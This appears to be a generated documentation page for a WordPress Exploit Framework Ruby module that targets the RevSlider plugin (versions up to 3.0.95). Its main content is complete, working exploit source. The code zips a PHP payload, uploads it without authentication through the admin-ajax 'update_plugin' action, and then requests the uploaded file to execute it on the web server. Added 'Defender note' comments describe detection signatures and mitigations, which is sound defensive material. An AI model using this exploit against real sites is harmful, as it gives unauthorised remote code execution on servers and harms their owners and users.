Class: Wpxf::Exploit::RevsliderShellUpload
- Includes:
- Wpxf
- Defined in:
- lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb
Direct Known Subclasses
AriesRevsliderShellUpload, AvadaRevsliderShellUpload, AwakeRevsliderShellUpload, BeachApolloRevsliderShellUpload, BretheonRevsliderShellUpload, CentumRevsliderShellUpload, ConstructRevsliderShellUpload, DiviRevsliderShellUpload, EchelonRevsliderShellUpload, EleganceRevsliderShellUpload, FusionRevsliderShellUpload, IncredibleWpRevsliderShellUpload, Manbiz2RevsliderShellUpload, MedicateRevsliderShellUpload, MethodRevsliderShellUpload, ModularRevsliderShellUpload, MyriadRevsliderShellUpload, PersuasionRevsliderShellUpload, SeabirdRevsliderShellUpload, ShowbizRevsliderShellUpload, SoulmedicRevsliderShellUpload, StrikingRRevsliderShellUpload, UltimatumRevsliderShellUpload
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary
- #check ⇒ Object
- #initialize ⇒ RevsliderShellUpload (constructor): A new instance of RevsliderShellUpload.
- #payload_body_builder(payload_name) ⇒ Object
- #plugin_url ⇒ Object
- #run ⇒ Object
- #upload_folder ⇒ Object
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ RevsliderShellUpload
Returns a new instance of RevsliderShellUpload.
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 6

# Registers this module's metadata (name, description, authors, references
# and disclosure date) through update_info after running the parent
# constructor.
#
# Defender note: per the description registered here, the affected range is
# RevSlider <= 3.0.95 and the flaw needs no authentication, so any install in
# that range is exposed to anonymous visitors until it is upgraded.
def initialize
  super

  summary = 'This module exploits a file upload vulnerability in versions '\
            '<= 3.0.95 of the RevSlider plugin which '\
            'allows unauthenticated users to upload and execute PHP scripts '\
            'in the context of the web server.'

  credits = [
    'Simo Ben youssef', # Vulnerability discovery
    'rastating' # WPXF module
  ]

  advisories = [
    ['EDB', '35385'],
    ['WPVDB', '7954'],
    ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/']
  ]

  update_info(
    name: 'RevSlider <= 3.0.95 Shell Upload',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Nov 26 2014'
  )
end
Instance Method Details
#check ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 28

# Version check based on the plugin's release_log.txt.
#
# Builds the URL of release_log.txt under the plugin directory and hands it,
# together with a case-insensitive, line-anchored "version X.Y[.Z]" regexp and
# the string '3.0.96', to check_version_from_custom_file. The third argument
# is presumably the first fixed release (the module targets <= 3.0.95);
# confirm against the helper's definition.
#
# Defender note: this fingerprint depends on release_log.txt being served to
# anonymous visitors. Blocking access to it hides the version string but does
# not remove the upload flaw; moving to a release newer than 3.0.95 does.
#
# @return [Object] whatever check_version_from_custom_file returns
def check
  version_regex = /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi
  check_version_from_custom_file(
    normalize_uri(plugin_url, 'release_log.txt'),
    version_regex,
    '3.0.96'
  )
end
#payload_body_builder(payload_name) ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 38

# Assembles the request body for the upload step.
#
# The body carries a zip named 'revslider.zip' in the 'update_file' field,
# containing a single entry "revslider/<payload_name>" with the encoded
# payload, plus the form fields action=revslider_ajax_action and
# client_action=update_plugin.
#
# Defender note: those two field values together with an 'update_file'
# archive, arriving from a client with no authenticated session, are the
# request signature to match in WAF rules or request-body logging.
#
# @param payload_name [String] file name used for the entry inside the zip
# @return [Utility::BodyBuilder] the populated builder
def payload_body_builder(payload_name)
  Utility::BodyBuilder.new.tap do |form|
    archive_entries = { "revslider/#{payload_name}" => payload.encoded }
    form.add_zip_file('update_file', archive_entries, 'revslider.zip')
    form.add_field('action', 'revslider_ajax_action')
    form.add_field('client_action', 'update_plugin')
  end
end
#plugin_url ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 34

# URL of the plugin directory: the 'revslider' segment appended to the value
# of wordpress_url_plugins.
#
# @return [Object] the value produced by normalize_uri
def plugin_url
  plugins_root = wordpress_url_plugins
  normalize_uri(plugins_root, 'revslider')
end
#run ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 51

# Runs the module: uploads the payload, then requests the uploaded file.
#
# Sequence, as visible in this method:
#   1. Bail out with false unless check_wordpress_and_online passes.
#   2. Pick a file name of 5-10 characters from Utility::Text.rand_alpha
#      (presumably letters only; confirm in the helper) with a .php extension.
#   3. POST the body from payload_body_builder to wordpress_url_admin_ajax.
#   4. Treat no response / timeout, a non-200 status, or a body containing a
#      line that is exactly "0" as failure and return false.
#   5. GET the file under upload_folder and report a non-blank 200 body.
#
# Defender note: the observable trail is a POST to the admin AJAX endpoint
# followed by a GET for a short, randomly named .php file under the plugin's
# temp/update_extract/revslider/ directory. PHP files appearing in that
# directory, or requests for them, are strong indicators to alert on, and
# refusing to execute PHP from that path limits the impact if the plugin
# cannot be upgraded immediately.
#
# @return [Boolean] false on any of the failures above, true otherwise
def run
  super
  return false unless check_wordpress_and_online

  emit_info 'Preparing payload...'
  name_length = rand(5..10)
  payload_name = "#{Utility::Text.rand_alpha(name_length)}.php"
  builder = payload_body_builder(payload_name)

  emit_info 'Uploading payload...'
  upload_res = nil
  builder.create do |body|
    upload_res = execute_post_request(url: wordpress_url_admin_ajax, body: body)
  end

  # Nothing came back at all, or the request timed out.
  if upload_res.nil? || upload_res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # Any status other than 200 is reported verbosely and treated as a failure.
  unless upload_res.code == 200
    emit_info "Response code: #{upload_res.code}", true
    emit_info "Response body: #{upload_res.body}", true
    emit_error 'Failed to upload payload'
    return false
  end

  # A line consisting solely of "0" is read as the AJAX action not being handled.
  if upload_res.body =~ /^0$/
    emit_error 'Target not vulnerable or the plugin is deactivated'
    return false
  end

  payload_url = normalize_uri(upload_folder, payload_name)
  emit_success "Uploaded the payload to #{payload_url}", true

  emit_info 'Executing the payload...'
  exec_res = execute_get_request(url: payload_url)
  got_output = exec_res && exec_res.code == 200 && !exec_res.body.strip.empty?
  emit_success "Result: #{exec_res.body}" if got_output

  true
end
#upload_folder ⇒ Object
# File 'lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb', line 47

# URL of the directory where the uploaded archive's contents are expected to
# land: <plugin_url>/temp/update_extract/revslider.
#
# Defender note: this is the path to watch on disk and in access logs; it
# should not normally hold or serve executable PHP.
#
# @return [Object] the value produced by normalize_uri
def upload_folder
  extract_segments = %w[temp update_extract revslider]
  normalize_uri(plugin_url, *extract_segments)
end